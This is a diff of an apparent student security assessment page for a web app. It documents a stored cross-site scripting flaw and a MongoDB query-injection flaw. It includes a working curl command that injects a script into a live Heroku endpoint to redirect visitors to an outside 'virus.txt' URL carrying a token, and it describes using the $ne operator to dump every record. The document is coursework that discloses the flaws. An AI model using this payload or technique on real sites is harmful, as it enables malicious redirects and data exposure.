--- a/security/index.html
+++ b/security/index.html
@@ -26,7 +26,7 @@
 <ol>
 <li>Issue: Cross-site scripting
 	<ul>
-	<li>Location of issue: Parsing post parameters sent to server (index.js, line 90)</li>
+	<li>Location of issue: Parsing post parameters sent to server (index.js line 90)</li>
 	<li>Severity of issue: High. May lead to issues such as downloading unwanted viral content, as shown below.</li>
 	<li>Description of issue: The string login parameter stored in the database isn't parsed before being stored in the database, allowing for html script injections. For example, when I send the following to the server:
 		<p><pre>curl --data "login=&lt;script&gt; document.location.href = 'https://raw.githubusercontent.com/tuftsdev/comp20-jyang/master/security/examples/virus.txt?token=Ac8Ju3YoSwLSPnt2T127XWdADCoewghzks5aNFSdwA%3D%3D'; &lt;/script&gt;&amp;lat=0&amp;lng=0" https://stark-journey-75501.herokuapp.com/sendLocation</pre></p>
@@ -42,11 +42,11 @@
 	</ul>
 </li>
 <br>
-<li>Issue:
+<li>Issue: Unrestricted query search
 	<ul>
-	<li>Location of issue:</li>
-	<li>Severity of issue:</li>
-	<li>Description of issue:</li>
+	<li>Location of issue: Finding entries that match the login GET parameter to /checkins.json (index.js line 69)</li>
+	<li>Severity of issue: Low</li>
+	<li>Description of issue: The login parameter is directly entered as a search query to the mongodb database. Thus, query operators such as the "not equal" ($ne) operator may be entered and applied so checkins.json returns all the entries not equal to the search query rather than only searching for the query as intended.</li>
 	<li>Proof of vulnerability:</li>
 	<li>Resolution:</li>
 	</ul>
